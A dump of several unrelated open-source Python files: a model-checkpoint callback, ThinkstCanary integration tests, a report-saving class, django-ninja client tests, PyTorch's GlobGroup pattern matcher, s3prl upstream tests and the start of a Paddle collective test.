evaluation metric values that should be taken into account
score_log_file_path : str or None
file path to score log file
score_log_attempt_value : int
number of current attempt (used for comparing training curves for various hyperparameters)
best_map_log_file_path : str or None
file path to best map log file
"""
def __init__(self,
checkpoint_file_name_prefix="model",
last_checkpoint_file_name_suffix="last",
best_checkpoint_file_name_suffix=None,
last_checkpoint_dir_path="",
best_checkpoint_dir_path=None,
last_checkpoint_file_count=2,
best_checkpoint_file_count=2,
checkpoint_file_save_callback=None,
checkpoint_file_exts=(".params",),
save_interval=1,
num_epochs=-1,
param_names=None,
acc_ind=0,
# bigger=[True],
# mask=None,
score_log_file_path=None,
score_log_attempt_value=1,
best_map_log_file_path=None):
if not os.path.exists(last_checkpoint_dir_path):
os.makedirs(last_checkpoint_dir_path)
if best_checkpoint_dir_path is None:
best_checkpoint_dir_path = last_checkpoint_dir_path
assert ((last_checkpoint_file_name_suffix != best_checkpoint_file_name_suffix) and
(not ((last_checkpoint_file_name_suffix is None) and
(best_checkpoint_file_name_suffix is None))))
else:
assert (last_checkpoint_dir_path != best_checkpoint_dir_path)
if not os.path.exists(best_checkpoint_dir_path):
os.makedirs(best_checkpoint_dir_path)
self.last_checkpoints_prefix = self._create_checkpoint_file_path_full_prefix(
checkpoint_dir_path=last_checkpoint_dir_path,
checkpoint_file_name_prefix=checkpoint_file_name_prefix,
checkpoint_file_name_suffix=last_checkpoint_file_name_suffix)
self.best_checkpoints_prefix = self._create_checkpoint_file_path_full_prefix(
checkpoint_dir_path=best_checkpoint_dir_path,
checkpoint_file_name_prefix=checkpoint_file_name_prefix,
checkpoint_file_name_suffix=best_checkpoint_file_name_suffix)
assert (last_checkpoint_file_count >= 0)
self.last_checkpoint_file_count = last_checkpoint_file_count
assert (best_checkpoint_file_count >= 0)
self.best_checkpoint_file_count = best_checkpoint_file_count
self.checkpoint_file_save_callback = checkpoint_file_save_callback
self.checkpoint_file_exts = checkpoint_file_exts
assert (save_interval > 0)
self.save_interval = save_interval
assert (num_epochs > 0)
self.num_epochs = num_epochs
assert (type(param_names) == list)
self.param_names = param_names
assert (acc_ind >= 0) and (acc_ind < len(param_names))
self.acc_ind = acc_ind
# assert isinstance(bigger, list)
# self.bigger = np.array(bigger)
# if mask is None:
# self.mask = np.ones_like(self.bigger)
# else:
# assert isinstance(mask, list)
# assert (len(mask) == len(bigger))
# self.mask = np.array(mask)
if score_log_file_path is not None:
self.score_log_file_exist = (os.path.exists(score_log_file_path) and
os.path.getsize(score_log_file_path) > 0)
self.score_log_file = open(score_log_file_path, "a")
if not self.score_log_file_exist:
titles = ["Attempt", "Epoch"] + self.param_names
self.score_log_file.write("\t".join(titles))
self.score_log_file.flush()
else:
self.score_log_file = None
self.score_log_attempt_value = score_log_attempt_value
if best_map_log_file_path is not None:
self.best_map_log_file_exist = (os.path.exists(best_map_log_file_path) and
os.path.getsize(best_map_log_file_path) > 0)
self.best_map_log_file = open(best_map_log_file_path, "a")
if not self.best_map_log_file_exist:
titles = ["Attempt", "Epoch", self.param_names[self.acc_ind]]
self.best_map_log_file.write("\t".join(titles))
self.best_map_log_file.flush()
else:
self.best_map_log_file = None
self.best_eval_metric_value = None
self.best_eval_metric_epoch = None
self.last_checkpoint_params_file_stems = []
self.best_checkpoint_params_file_stems = []
self.can_save = (self.checkpoint_file_save_callback is not None)
def __del__(self):
"""
Releasing resources.
"""
if self.score_log_file is not None:
self.score_log_file.close()
if self.best_map_log_file is not None:
self.best_map_log_file.close()
def epoch_test_end_callback(self,
epoch1,
params,
**kwargs):
curr_acc = params[self.acc_ind]
if self.can_save:
last_checkpoint_params_file_stem = None
if (epoch1 % self.save_interval == 0) or (epoch1 == self.num_epochs):
last_checkpoint_params_file_stem = self._get_last_checkpoint_params_file_stem(epoch1, curr_acc)
self.checkpoint_file_save_callback(last_checkpoint_params_file_stem, **kwargs)
self.last_checkpoint_params_file_stems.append(last_checkpoint_params_file_stem)
if len(self.last_checkpoint_params_file_stems) > self.last_checkpoint_file_count:
removed_checkpoint_file_stem = self.last_checkpoint_params_file_stems[0]
for ext in self.checkpoint_file_exts:
removed_checkpoint_file_path = removed_checkpoint_file_stem + ext
if os.path.exists(removed_checkpoint_file_path):
os.remove(removed_checkpoint_file_path)
del self.last_checkpoint_params_file_stems[0]
if (self.best_eval_metric_value is None) or (curr_acc < self.best_eval_metric_value):
self.best_eval_metric_value = curr_acc
self.best_eval_metric_epoch = epoch1
best_checkpoint_params_file_stem = self._get_best_checkpoint_params_file_stem(epoch1, curr_acc)
if last_checkpoint_params_file_stem is not None:
for ext in self.checkpoint_file_exts:
last_checkpoint_params_file_path = last_checkpoint_params_file_stem + ext
best_checkpoint_params_file_path = best_checkpoint_params_file_stem + ext
assert (os.path.exists(last_checkpoint_params_file_path))
shutil.copy(
src=last_checkpoint_params_file_path,
dst=best_checkpoint_params_file_path)
else:
self.checkpoint_file_save_callback(best_checkpoint_params_file_stem, **kwargs)
self.best_checkpoint_params_file_stems.append(best_checkpoint_params_file_stem)
if len(self.best_checkpoint_params_file_stems) > self.best_checkpoint_file_count:
removed_checkpoint_file_stem = self.best_checkpoint_params_file_stems[0]
for ext in self.checkpoint_file_exts:
removed_checkpoint_file_path = removed_checkpoint_file_stem + ext
if os.path.exists(removed_checkpoint_file_path):
os.remove(removed_checkpoint_file_path)
del self.best_checkpoint_params_file_stems[0]
if self.best_map_log_file is not None:
self.best_map_log_file.write('\n{:02d}\t{:04d}\t{:.4f}'.format(
self.score_log_attempt_value, epoch1, curr_acc))
self.best_map_log_file.flush()
if self.score_log_file is not None:
score_log_file_row = "\n" + "\t".join([str(self.score_log_attempt_value), str(epoch1)] +
list(map(lambda x: "{:.4f}".format(x), params)))
self.score_log_file.write(score_log_file_row)
self.score_log_file.flush()
@staticmethod
def _create_checkpoint_file_path_full_prefix(checkpoint_dir_path,
checkpoint_file_name_prefix,
checkpoint_file_name_suffix):
checkpoint_file_name_full_prefix = checkpoint_file_name_prefix
if checkpoint_file_name_suffix is not None:
checkpoint_file_name_full_prefix += ("_" + checkpoint_file_name_suffix)
return os.path.join(
checkpoint_dir_path,
checkpoint_file_name_full_prefix)
@staticmethod
def _get_checkpoint_params_file_stem(checkpoint_file_path_prefix, epoch, acc):
return "{}_{:04d}_{:.4f}".format(checkpoint_file_path_prefix, epoch, acc)
def _get_last_checkpoint_params_file_stem(self, epoch, acc):
return self._get_checkpoint_params_file_stem(self.last_checkpoints_prefix, epoch, acc)
def _get_best_checkpoint_params_file_stem(self, epoch, acc):
return self._get_checkpoint_params_file_stem(self.best_checkpoints_prefix, epoch, acc)
|
bbfbf5984847fc4bebdb65b481274c5c689dd860
|
2a1b8a671aceda6bc446f8ce26400aa84fa444a6
|
/Packs/ThinkstCanary/Integrations/ThinkstCanary/ThinkstCanary_test.py
|
6a1d933db4e7f9083695250f85f6c31a680273df
|
[
"MIT"
] |
permissive
|
demisto/content
|
6d4722d46f0ff0beea2748e9f7de585bf91a78b4
|
890def5a0e0ae8d6eaa538148249ddbc851dbb6b
|
refs/heads/master
| 2023-09-04T00:02:25.618032
| 2023-09-03T21:56:22
| 2023-09-03T21:56:22
| 60,525,392
| 1,023
| 1,921
|
MIT
| 2023-09-14T20:55:24
| 2016-06-06T12:17:02
|
Python
|
UTF-8
|
Python
| false
| false
| 6,785
|
py
|
ThinkstCanary_test.py
|
import demistomock as demisto
import pytest
MOCK_PARAMS = {
'access-key': 'fake_access_key',
'secret-key': 'fake_access_key',
'server': 'http://123-fake-api.com/',
'unsecure': True,
'proxy': True,
'authentication_token': {'password': 1}
}
def test_fetch_incidents(mocker, requests_mock):
"""
Given: An existing last run time.
When: Running a fetch incidents command normally (not a first run).
Then: The last run time object should increment by 1 second.
2020-01-07-04:58:18 -> 2020-01-07-04:58:19
"""
mocker.patch.object(demisto, 'params', return_value=MOCK_PARAMS)
mocker.patch.object(demisto, 'getLastRun', return_value={'time': '2020-07-01-04:58:18'})
mocker.patch.object(demisto, 'setLastRun')
requests_mock.get('http://123-fake-api.com/api/v1/incidents/unacknowledged?newer_than=2020-07-01-04%3A58%3A18',
json={'incidents': [{'description': {'created': 1593579498}}]})
from ThinkstCanary import fetch_incidents_command
fetch_incidents_command()
assert demisto.setLastRun.call_args[0][0]['time'] == '2020-07-01-04:58:19'
def test_check_whitelist_command_not_whitelisted(mocker):
"""
Given: An IP to check
When: Running check_whitelist_command.
Then: The IP should not be ignored (not in the whitelist).
"""
ip_to_check = "1.2.3.4"
mocker.patch.object(demisto, 'results')
mocker.patch.object(demisto, 'params', return_value=MOCK_PARAMS)
mocker.patch.object(demisto, 'args', return_value={'ip': ip_to_check})
import ThinkstCanary
mocker.patch.object(ThinkstCanary, 'check_whitelist', return_value={'is_ip_ignored': False,
'is_whitelist_enabled': True})
ThinkstCanary.check_whitelist_command()
assert demisto.results.call_args_list[0][0][0].get('HumanReadable') == 'The IP address 1.2.3.4:Any is not ' \
'Whitelisted'
def test_check_whitelist_commands_whitelisted(mocker):
"""
Given: An already whitelisted IP to check
When: Inserting IP to whitelist (whitelist_ip_command) and checking if it is whitelisted (check_whitelist_command).
Then: The IP should be ignored (in the whitelist), and an appropriate message to the user should be prompted.
"""
ip_to_whitelist = "1.2.3.4"
mocker.patch.object(demisto, 'results')
mocker.patch.object(demisto, 'params', return_value=MOCK_PARAMS)
mocker.patch.object(demisto, 'args', return_value={'ip': ip_to_whitelist})
import ThinkstCanary
mocker.patch.object(ThinkstCanary, 'whitelist_ip', return_value={'message': 'Whitelist added',
'result': 'success'})
mocker.patch.object(ThinkstCanary, 'check_whitelist', return_value={'is_ip_ignored': True,
'is_whitelist_enabled': True})
ThinkstCanary.whitelist_ip_command()
ThinkstCanary.check_whitelist_command()
assert demisto.results.call_args_list[1][0][0].get('HumanReadable') == 'The IP address 1.2.3.4:Any is Whitelisted'
@pytest.mark.parametrize('arg_status, return_status, expected_result',
[('Acknowledge', 'acknowledged', 'The Alert alert_id was acknowledged'),
('Unacknowledge', 'unacknowledged', 'The Alert alert_id was unacknowledged')])
def test_alert_status_command(mocker, arg_status, return_status, expected_result):
"""
Given: An alert id to check.
When: Running alert_status_command.
Then: ensure the expected result returned.
"""
mocker.patch.object(demisto, 'results')
mocker.patch.object(demisto, 'params', return_value=MOCK_PARAMS)
mocker.patch.object(demisto, 'args', return_value={'alert_id': 'alert_id', 'status': arg_status})
import ThinkstCanary
mocker.patch.object(ThinkstCanary, 'http_request', return_value={'action': return_status})
ThinkstCanary.alert_status_command()
assert expected_result in demisto.results.call_args_list[0][0][0].get('HumanReadable')
def test_list_canaries_command(mocker):
"""
Given: demisto params.
When: Running list_canaries_command.
Then: ensure the expected result returned.
"""
mocker.patch.object(demisto, 'results')
mocker.patch.object(demisto, 'params', return_value=MOCK_PARAMS)
import ThinkstCanary
mocker.patch.object(ThinkstCanary, 'http_request', return_value={'devices': [{'description': 'Description',
'id': 'ID',
'ip_address': 'Address',
'last_seen': 'LastSeen',
'live': 'Status',
'location': 'Location',
'name': 'Name',
'updated_std': 'LastUpdated',
'version': 'Version'}]})
ThinkstCanary.list_canaries_command()
assert 'Canary Devices' in demisto.results.call_args_list[0][0][0].get('HumanReadable')
def test_list_tokens_command(mocker):
"""
Given: demisto params.
When: Running list_tokens_command.
Then: ensure the expected result returned.
"""
mocker.patch.object(demisto, 'results')
mocker.patch.object(demisto, 'params', return_value=MOCK_PARAMS)
import ThinkstCanary
mocker.patch.object(ThinkstCanary, 'http_request', return_value={'tokens': [{'canarytoken': 'CanaryToken',
'created_printable': 'CreatedTime',
'enabled': 'Enabled',
'kind': 'Kind',
'triggered_count': 'Triggered',
'doc_name': 'DocName',
'url': 'TokenURL'}]})
ThinkstCanary.list_tokens_command()
assert 'Canary Tools Tokens' in demisto.results.call_args_list[0][0][0].get('HumanReadable')
|
bc8e28d2582e13489cd6c5377a5f0a5d087506de
|
a6c05f5bea011ddce375c4a31e52e04bcb2ee053
|
/dataprep/eda/create_report/report.py
|
457c4499323438791db2b3d31110054ff6648203
|
[
"MIT"
] |
permissive
|
sfu-db/dataprep
|
8db4286f4eccfde9e00b4e4fe4ac7d0fd567d9f1
|
17eda6925b9c37200eae969813ed41583d225989
|
refs/heads/develop
| 2023-08-18T09:01:04.057248
| 2023-05-30T02:39:47
| 2023-08-03T04:05:43
| 186,311,346
| 1,755
| 215
|
MIT
| 2023-08-03T04:05:45
| 2019-05-12T22:37:24
|
Python
|
UTF-8
|
Python
| false
| false
| 3,487
|
py
|
report.py
|
"""
This module implements the Report class.
"""
import sys
import webbrowser
from pathlib import Path
from tempfile import NamedTemporaryFile
from typing import Optional
import os
from ...utils import is_notebook
CELL_HEIGHT_OVERRIDE = """<style>
div.output_scroll {
height: 850px;
}
div.cell-output>div:first-of-type {
max-height: 850px !important;
}
</style>"""
class Report:
"""
This class creates a customized Report object for the create_report function
"""
def __init__(self, report: str) -> None:
self.report = report
def _repr_html_(self) -> str:
"""
Display report inside a notebook
"""
return f"{CELL_HEIGHT_OVERRIDE}<div style='background-color: #fff;'>{self.report}</div>"
def __repr__(self) -> str:
"""
Remove object name
"""
return ""
def save(self, path: Optional[str] = None) -> None:
"""
Save report to current working directory.
Parameters
----------
filename: Optional[str], default 'report'
The filename used for saving report without the extension name.
to: Optional[str], default Path.cwd()
The path to where the report will be saved.
"""
saved_file_path = None
if path:
extension = os.path.splitext(path)[1]
posix_path = Path(path).expanduser()
if posix_path.is_dir():
if path.endswith("/"):
path += "report.html"
else:
path += "/report.html"
elif extension:
if extension != ".html":
raise ValueError(
"Format '{extension}' is not supported (supported formats: html)"
)
else:
path += ".html"
saved_file_path = Path(path).expanduser()
else:
path = str(Path.cwd()) + "/report.html"
saved_file_path = Path(path).expanduser()
with open(saved_file_path, "w", encoding="utf-8") as file:
file.write(self.report)
print(f"Report has been saved to {saved_file_path}!")
def show_browser(self) -> None:
"""
Open the report in the browser. This is useful when calling from terminmal.
"""
with NamedTemporaryFile(suffix=".html", delete=False) as tmpf:
pass
with open(tmpf.name, "w", encoding="utf-8") as file:
file.write(self.report)
webbrowser.open(f"file://{tmpf.name}", new=2)
def show(self) -> None:
"""
Render the report. This is useful when calling plot in a for loop.
"""
# if not called from notebook environment, ref to show_browser function.
if not is_notebook():
print(
"The plot will not show in a notebook environment, "
"please try 'show_browser' if you want to open it in browser",
file=sys.stderr,
)
try:
from IPython.display import ( # pylint: disable=import-outside-toplevel
HTML,
display,
)
display(HTML(self._repr_html_()))
except ImportError:
pass
|
057ac9c480dca2381a9d63bbdb749d4bebc4041f
|
a4913dc468f763ead62218a01ad058c84a17a7b1
|
/tests/test_test_client.py
|
e171aeb3e235196a57384c467b4702a1457ba84f
|
[
"MIT"
] |
permissive
|
vitalik/django-ninja
|
200c922f134ed09cb51957bc134a4a0830d3d8ff
|
8be35e42a9dc2365e764a0fea0a0b868eeae312b
|
refs/heads/master
| 2023-08-31T02:44:05.149087
| 2023-08-28T12:35:04
| 2023-08-28T12:35:04
| 265,194,554
| 5,034
| 340
|
MIT
| 2023-09-14T09:58:40
| 2020-05-19T08:48:53
|
Python
|
UTF-8
|
Python
| false
| false
| 2,694
|
py
|
test_test_client.py
|
from datetime import datetime
from http import HTTPStatus
from unittest import mock
import pytest
from django.utils import timezone
from ninja import Router
from ninja.schema import Schema
from ninja.testing import TestClient
router = Router()
@router.get("/request/build_absolute_uri")
def request_build_absolute_uri(request):
return request.build_absolute_uri()
@router.get("/request/build_absolute_uri/location")
def request_build_absolute_uri_location(request):
return request.build_absolute_uri("location")
@router.get("/test")
def simple_get(request):
return "test"
client = TestClient(router)
@pytest.mark.parametrize(
"path,expected_status,expected_response",
[
("/request/build_absolute_uri", HTTPStatus.OK, "http://testlocation/"),
(
"/request/build_absolute_uri/location",
HTTPStatus.OK,
"http://testlocation/location",
),
],
)
def test_sync_build_absolute_uri(path, expected_status, expected_response):
response = client.get(path)
assert response.status_code == expected_status
assert response.json() == expected_response
@pytest.mark.parametrize(
"version, has_headers",
[
((2, 0), False),
((2, 1), False),
((2, 2), True),
((3, 0), True),
],
)
def test_django_2_2_plus_headers(version, has_headers):
with mock.patch("ninja.testing.client.django", VERSION=version):
with mock.patch.object(client, "_call") as call:
client.get("/test")
request = call.call_args[0][1]
# for Django >= 2.2 we apply a HttpHeaders instance to .headers
assert isinstance(request.headers, mock.Mock) != has_headers
class ClientTestSchema(Schema):
time: datetime
def test_schema_as_data():
schema_instance = ClientTestSchema(time=timezone.now().replace(microsecond=0))
with mock.patch.object(client, "_call") as call:
client.post("/test", json=schema_instance)
request = call.call_args[0][1]
assert (
ClientTestSchema.model_validate_json(request.body).model_dump_json()
== schema_instance.model_dump_json()
)
def test_json_as_body():
schema_instance = ClientTestSchema(time=timezone.now().replace(microsecond=0))
with mock.patch.object(client, "_call") as call:
client.post(
"/test",
data=schema_instance.model_dump_json(),
content_type="application/json",
)
request = call.call_args[0][1]
assert (
ClientTestSchema.model_validate_json(request.body).model_dump_json()
== schema_instance.model_dump_json()
)
|
43a3b771d6a8fdbb18b275e0ef6604e333ce7878
|
afd2087e80478010d9df66e78280f75e1ff17d45
|
/torch/package/glob_group.py
|
a8434788d016fd64cb03e1cf5cdebea5d65d6a59
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-secret-labs-2011",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
] |
permissive
|
pytorch/pytorch
|
7521ac50c47d18b916ae47a6592c4646c2cb69b5
|
a6f7dd4707ac116c0f5fb5f44f42429f38d23ab4
|
refs/heads/main
| 2023-08-03T05:05:02.822937
| 2023-08-03T00:40:33
| 2023-08-03T04:14:52
| 65,600,975
| 77,092
| 24,610
|
NOASSERTION
| 2023-09-14T21:58:39
| 2016-08-13T05:26:41
|
Python
|
UTF-8
|
Python
| false
| false
| 3,610
|
py
|
glob_group.py
|
import re
from typing import Iterable, Union
GlobPattern = Union[str, Iterable[str]]
class GlobGroup:
"""A set of patterns that candidate strings will be matched against.
A candidate is composed of a list of segments separated by ``separator``, e.g. "foo.bar.baz".
A pattern contains one or more segments. Segments can be:
- A literal string (e.g. "foo"), which matches exactly.
- A string containing a wildcard (e.g. "torch*", or "foo*baz*"). The wildcard matches
any string, including the empty string.
- A double wildcard ("**"). This matches against zero or more complete segments.
Examples:
``torch.**``: matches ``torch`` and all its submodules, e.g. ``torch.nn`` and ``torch.nn.functional``.
``torch.*``: matches ``torch.nn`` or ``torch.functional``, but not ``torch.nn.functional``.
``torch*.**``: matches ``torch``, ``torchvision``, and all their submodules.
A candidates will match the ``GlobGroup`` if it matches any of the ``include`` patterns and
none of the ``exclude`` patterns.
Args:
include (Union[str, Iterable[str]]): A string or list of strings,
each representing a pattern to be matched against. A candidate
will match if it matches *any* include pattern
exclude (Union[str, Iterable[str]]): A string or list of strings,
each representing a pattern to be matched against. A candidate
will be excluded from matching if it matches *any* exclude pattern.
separator (str): A string that delimits segments in candidates and
patterns. By default this is "." which corresponds to how modules are
named in Python. Another common value for this is "/", which is
the Unix path separator.
"""
def __init__(
self, include: GlobPattern, *, exclude: GlobPattern = (), separator: str = "."
):
self._dbg = f"GlobGroup(include={include}, exclude={exclude})"
self.include = GlobGroup._glob_list(include, separator)
self.exclude = GlobGroup._glob_list(exclude, separator)
self.separator = separator
def __str__(self):
return self._dbg
def __repr__(self):
return self._dbg
def matches(self, candidate: str) -> bool:
candidate = self.separator + candidate
return any(p.fullmatch(candidate) for p in self.include) and all(
not p.fullmatch(candidate) for p in self.exclude
)
@staticmethod
def _glob_list(elems: GlobPattern, separator: str = "."):
if isinstance(elems, str):
return [GlobGroup._glob_to_re(elems, separator)]
else:
return [GlobGroup._glob_to_re(e, separator) for e in elems]
@staticmethod
def _glob_to_re(pattern: str, separator: str = "."):
# to avoid corner cases for the first component, we prefix the candidate string
# with '.' so `import torch` will regex against `.torch`, assuming '.' is the separator
def component_to_re(component):
if "**" in component:
if component == "**":
return "(" + re.escape(separator) + "[^" + separator + "]+)*"
else:
raise ValueError("** can only appear as an entire path segment")
else:
return re.escape(separator) + ("[^" + separator + "]*").join(
re.escape(x) for x in component.split("*")
)
result = "".join(component_to_re(c) for c in pattern.split(separator))
return re.compile(result)
|
d5671d0dfcedf4374b84f3fd20221ac04bda7107
|
cadb6dceb7bb67ce47ef48b2c83f480a65d6b01a
|
/test/test_upstream.py
|
2027cdda7256d44695d1e0c8bc3a269ca26c2b71
|
[
"Apache-2.0",
"CC-BY-NC-4.0"
] |
permissive
|
s3prl/s3prl
|
52ec2ae4df5a61c786c122085603aa9c5e8c2681
|
76a9432b824f6ae3eae09a35a67782c4ed582832
|
refs/heads/main
| 2023-08-17T02:26:57.524087
| 2023-06-10T17:12:27
| 2023-06-10T17:12:27
| 196,905,457
| 1,549
| 398
|
Apache-2.0
| 2023-09-14T13:07:05
| 2019-07-15T01:54:52
|
Python
|
UTF-8
|
Python
| false
| false
| 9,302
|
py
|
test_upstream.py
|
import logging
import os
import shutil
import tempfile
import traceback
from pathlib import Path
from subprocess import check_call
import pytest
import torch
from filelock import FileLock
from s3prl.nn import Featurizer, S3PRLUpstream
from s3prl.util.download import _urls_to_filepaths
from s3prl.util.pseudo_data import get_pseudo_wavs
logger = logging.getLogger(__name__)
TEST_MORE_ITER = 2
TRAIN_MORE_ITER = 5
SAMPLE_RATE = 16000
ATOL = 0.01
MAX_LENGTH_DIFF = 3
EXTRA_SHORT_SEC = 0.001
EXTRACTED_GT_DIR = Path(__file__).parent.parent / "sample_hidden_states"
# Expect the following directory structure:
#
# -- s3prl/ (repository root)
# ---- s3prl/ (package root)
# ---- test/
# ------- test_upstream.py
# ---- sample_hidden_states/
def _prepare_sample_hidden_states():
lock_file = Path(__file__).parent.parent / "sample_hidden_states.lock"
with FileLock(str(lock_file)):
# NOTE: home variable is necessary for git lfs to work
env = dict(os.environ)
if not "HOME" in env:
env["HOME"] = Path.home()
if not EXTRACTED_GT_DIR.is_dir():
with tempfile.TemporaryDirectory() as tempdir:
tempdir = Path(tempdir)
tempdir.mkdir(exist_ok=True, parents=True)
logger.info("Downloading extracted sample hidden states...")
check_call("git lfs install".split(), cwd=tempdir, env=env)
check_call(
"git clone https://huggingface.co/datasets/s3prl/sample_hidden_states".split(),
cwd=tempdir,
env=env,
)
shutil.move(
str(tempdir / "sample_hidden_states"), str(EXTRACTED_GT_DIR.parent)
)
else:
logger.info(f"{EXTRACTED_GT_DIR} exists. Perform git pull...")
check_call("git pull".split(), cwd=EXTRACTED_GT_DIR, env=env)
try:
lock_file.unlink()
except FileNotFoundError:
pass
def _extract_feat(
model: S3PRLUpstream,
seed: int = 0,
**pseudo_wavs_args,
):
wavs, wavs_len = get_pseudo_wavs(seed=seed, padded=True, **pseudo_wavs_args)
all_hs, all_lens = model(wavs, wavs_len)
return all_hs
def _all_hidden_states_same(hs1, hs2):
for h1, h2 in zip(hs1, hs2):
if h1.size(1) != h2.size(1):
length_diff = abs(h1.size(1) - h2.size(1))
assert length_diff <= MAX_LENGTH_DIFF, f"{length_diff} > {MAX_LENGTH_DIFF}"
min_seqlen = min(h1.size(1), h2.size(1))
h1 = h1[:, :min_seqlen, :]
h2 = h2[:, :min_seqlen, :]
assert torch.allclose(h1, h2, atol=ATOL)
def _load_ground_truth(name: str):
source = f"{EXTRACTED_GT_DIR}/{name}.pt"
if source.startswith("http"):
path = _urls_to_filepaths(source)
else:
path = source
return torch.load(path)
def _compare_with_extracted(name: str):
model = S3PRLUpstream(name)
model.eval()
with torch.no_grad():
hs = _extract_feat(model)
hs_gt = _load_ground_truth(name)
_all_hidden_states_same(hs, hs_gt)
for i in range(TEST_MORE_ITER):
more_hs = _extract_feat(model)
for h1, h2 in zip(hs, more_hs):
assert torch.allclose(
h1, h2
), "should have deterministic representation in eval mode"
for i in range(TEST_MORE_ITER):
more_hs = _extract_feat(model, seed=i + 1)
assert len(hs) == len(
more_hs
), "should have deterministic num_layer in eval mode"
model.train()
for i in range(TRAIN_MORE_ITER):
more_hs = _extract_feat(model, seed=i + 1)
assert len(hs) == len(
more_hs
), "should have deterministic num_layer in train mode"
def _test_forward_backward(name: str, **pseudo_wavs_args):
"""
Test the upstream with the name: 'name' can successfully forward and backward
"""
with torch.autograd.set_detect_anomaly(True):
model = S3PRLUpstream(name)
hs = _extract_feat(model, **pseudo_wavs_args)
h_sum = 0
for h in hs:
h_sum = h_sum + h.sum()
h_sum.backward()
def _filter_options(options: list):
options = [
name
for name in options
if (not name == "customized_upstream")
and (
not "mos" in name
) # mos models do not have hidden_states key. They only return a single mos score
and (
not "stft_mag" in name
) # stft_mag upstream must past the config file currently and is not so important. So, skip the test now
and (
not "pase" in name
) # pase_plus needs lots of dependencies and is difficult to be tested and is not very worthy today
and (
not name == "xls_r_1b"
) # skip due to too large model, too long download time
and (
not name == "xls_r_2b"
) # skip due to too large model, too long download time
and (
not name in ["ast", "ssast_patch_base", "ssast_frame_base"]
) # FIXME: remove timm dependency
and (not name == "vggish") # FIXME: remove resampy dependency
and (not name == "byol_s_cvt") # FIXME: remove einops dependency
and (not "lighthubert" in name) # FIXME: solve the random subnet issue
and (not name == "passt_hop160base2lvl") # too huge memory usage
and (not name == "passt_hop160base2lvlmel") # too huge memory usage
and (not name == "passt_hop100base2lvl") # too huge memory usage
and (not name == "passt_hop100base2lvlmel") # too huge memory usage
]
options = [option for option in options if "passt" in option]
return options
"""
Test cases ensure that all upstreams are working and are same with pre-extracted features
"""
@pytest.mark.upstream
@pytest.mark.parametrize(
"name",
[
"wav2vec2",
"wavlm",
"hubert",
],
)
def test_common_upstream(name):
_prepare_sample_hidden_states()
_compare_with_extracted(name)
_test_forward_backward(
name, min_secs=EXTRA_SHORT_SEC, max_secs=EXTRA_SHORT_SEC, n=1
)
_test_forward_backward(
name, min_secs=EXTRA_SHORT_SEC, max_secs=EXTRA_SHORT_SEC, n=2
)
_test_forward_backward(name, min_secs=EXTRA_SHORT_SEC, max_secs=1, n=3)
@pytest.mark.upstream
@pytest.mark.slow
def test_upstream_with_extracted(upstream_names: str):
_prepare_sample_hidden_states()
if upstream_names is not None:
options = upstream_names.split(",")
else:
options = S3PRLUpstream.available_names(only_registered_ckpt=True)
options = _filter_options(options)
options = sorted(options)
tracebacks = []
for name in options:
logger.info(f"Testing upstream: '{name}'")
try:
_compare_with_extracted(name)
except Exception as e:
logger.error(f"{name}\n{traceback.format_exc()}")
tb = traceback.format_exc()
tracebacks.append((name, tb))
if len(tracebacks) > 0:
for name, tb in tracebacks:
logger.error(f"Error in {name}:\n{tb}")
logger.error(f"All failed models:\n{[name for name, _ in tracebacks]}")
assert False
@pytest.mark.upstream
@pytest.mark.slow
def test_upstream_forward_backward(upstream_names: str):
if upstream_names is not None:
options = upstream_names.split(",")
else:
options = S3PRLUpstream.available_names(only_registered_ckpt=True)
options = _filter_options(options)
options = sorted(options)
options = reversed(options)
tracebacks = []
for name in options:
logger.info(f"Testing upstream: '{name}'")
try:
_test_forward_backward(name)
except Exception as e:
logger.error(f"{name}\n{traceback.format_exc()}")
tb = traceback.format_exc()
tracebacks.append((name, tb))
if len(tracebacks) > 0:
for name, tb in tracebacks:
logger.error(f"Error in {name}:\n{tb}")
logger.error(f"All failed models:\n{[name for name, _ in tracebacks]}")
assert False
@pytest.mark.upstream
@pytest.mark.parametrize("layer_selections", [None, [0, 4, 9]])
@pytest.mark.parametrize("normalize", [False, True])
def test_featurizer(layer_selections, normalize):
model = S3PRLUpstream("hubert")
featurizer = Featurizer(
model, layer_selections=layer_selections, normalize=normalize
)
wavs, wavs_len = get_pseudo_wavs(padded=True)
all_hs, all_lens = model(wavs, wavs_len)
hs, hs_len = featurizer(all_hs, all_lens)
assert isinstance(hs, torch.FloatTensor)
assert isinstance(hs_len, torch.LongTensor)
@pytest.mark.upstream
def test_upstream_properties():
model = S3PRLUpstream("hubert")
featurizer = Featurizer(model)
assert isinstance(model.hidden_sizes, (tuple, list)) and isinstance(
model.hidden_sizes[0], int
)
assert isinstance(model.downsample_rates, (tuple, list)) and isinstance(
model.downsample_rates[0], int
)
assert isinstance(featurizer.output_size, int)
assert isinstance(featurizer.downsample_rate, int)
|
e528b06cf1dcf05276a6f54627d9c60ea8af80f5
|
974d04d2ea27b1bba1c01015a98112d2afb78fe5
|
/test/collective/collective_global_scatter_dygraph.py
|
2e5001371fd47bdd926bc7638f082c9f8be7fe49
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/Paddle
|
b3d2583119082c8e4b74331dacc4d39ed4d7cff0
|
22a11a60e0e3d10a3cf610077a3d9942a6f964cb
|
refs/heads/develop
| 2023-08-17T21:27:30.568889
| 2023-08-17T12:38:22
| 2023-08-17T12:38:22
| 65,711,522
| 20,414
| 5,891
|
Apache-2.0
| 2023-09-14T19:20:51
| 2016-08-15T06:59:08
|
C++
|
UTF-8
|
Python
| false
| false
| 2,410
|
py
|
collective_global_scatter_dygraph.py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import numpy as np
from legacy_test.test_collective_api_base import (
TestCollectiveAPIRunnerBase,
runtime_main,
)
import paddle
from paddle import fluid
from paddle.distributed.utils import moe_utils
class TestCollectiveGlobalScatterAPI(TestCollectiveAPIRunnerBase):
def __init__(self):
self.global_ring_id = 0
def get_model(self, main_prog, startup_program, rank, indata=None):
with fluid.program_guard(main_prog, startup_program):
